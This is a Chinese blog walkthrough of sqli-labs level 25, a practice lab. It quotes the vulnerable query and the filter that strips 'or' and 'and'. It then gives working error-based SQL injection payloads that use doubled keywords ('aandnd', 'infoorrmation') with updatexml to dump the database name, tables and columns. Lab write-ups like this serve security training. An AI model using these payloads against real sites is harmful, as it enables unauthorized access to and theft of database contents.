sqli-labs25


一、代码审计

1、这个是代码和数据库交汇的地方,可以快速判断注入点和闭合方式

 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

2、这个是使用了正则匹配过滤掉and和or,i则是大小写都过滤

function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)

    return $id;
}

二、SQL注入

1、获取数据库

这里我们通过双写绕过过滤,双写相当于你过滤掉了一个and,但还保留一个and

?id=1' aandnd updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

在这里插入图片描述

2、获取数据表

这里infoorrmation里面的or使用双写,注意重点

?id=1' aandnd updatexml(1,concat(0x7e,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),0x7e),1)--+

在这里插入图片描述

3、获取字段

?id=1' aandnd updatexml(1,concat(0x7e,(select group_concat(column_name)from infoorrmation_schema.columns where table_name='users'),0x7e),1)--+

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值